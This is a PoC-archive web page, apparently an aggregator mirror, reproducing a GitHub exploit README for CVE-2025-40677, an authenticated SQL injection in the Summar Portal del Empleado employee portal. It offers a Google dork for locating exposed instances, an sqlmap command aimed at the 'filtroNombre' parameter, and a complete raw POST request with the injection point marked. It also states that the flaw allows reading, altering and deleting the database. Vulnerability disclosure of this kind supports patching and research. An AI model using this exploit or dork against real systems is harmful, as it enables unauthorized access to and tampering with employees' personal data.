Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2025-40677 PoC — Summar Portal del Empleado SQL注入漏洞

Source
https://github.com/PeterGabaldon/CVE-2025-40677
Associated Vulnerability
Title:Summar Portal del Empleado SQL注入漏洞 (CVE-2025-40677)
Description:Summar Portal del Empleado是西班牙Summar公司的一个员工门户系统。 Summar Portal del Empleado存在SQL注入漏洞,该漏洞源于对文件/MemberPages/quienesquien.aspx中参数ctl00$ContentPlaceHolder1$filtroNombre的错误操作,可能导致SQL注入攻击。
Description
Summar Employee Portal Prior to 3.98.0 Authenticated SQL Injection - CVE-2025-40677
Readme
# Exploit Title: Summar Employee Portal Prior to 3.98.0 Authenticated SQL Injection - CVE-2025-40677
# Google Dork: inurl:"/MemberPages/quienesquien.aspx"
# Date: 09/22/2025
# Exploit Author: Peter Gabaldon - https://pgj11.com/
# Vendor Homepage: https://www.summar.es/
# Software Link: https://www.summar.es/software-recursos-humanos/
# Version: < 3.98.0
# Tested on: Kali
# CVE : CVE-2025-40677
# Description: SQL injection vulnerability in Summar Software´s Portal del Empleado. This vulnerability allows an attacker to retrieve, create, update, and delete the database by sending a POST request using the parameter “ctl00$ContentPlaceHolder1$filtroNombre” in “/MemberPages/quienesquien.aspx”.

```
$ sqlmap --random-agent -r req.sqli.xml -p 'ctl00%24ContentPlaceHolder1%24filtroNombre' --dbms="MSSQL"

POST /MemberPages/quienesquien.aspx HTTP/1.1
Host: [REDACTED]
Cookie: [REDACTED]
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
X-Requested-With: XMLHttpRequest
X-Microsoftajax: Delta=true
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded; charset=utf-8
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
Connection: keep-alive
 
ctl00%24ScriptManager1=ctl00%24ScriptManager1%7Cctl00%24ContentPlaceHolder1%24lnkVerTrabajador&ctl00%24ContentPlaceHolder1%24filtroNombre=[SQL_INJECTION_POINT]&ctl00%24ContentPlaceHolder1%24ddlEmpresa=&ctl00%24ContentPlaceHolder1%24filtroCentro=&ctl00%24ContentPlaceHolder1%24filtroUO=&ctl00%24ContentPlaceHolder1%24filtroPuesto=&__EVENTTARGET=ctl00%24ContentPlaceHolder1%24lnkVerTrabajador&__EVENTARGUMENT=&__LASTFOCUS=&__VIEWSTATE=...&__VIEWSTATEGENERATOR=...&__ASYNCPOST=true&
```
File Snapshot

 [4.0K]  /data/pocs/191d96c77efe9c88c96852e58118d9dc93615997
└── [1.8K]  README.md

0 directories, 1 file
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.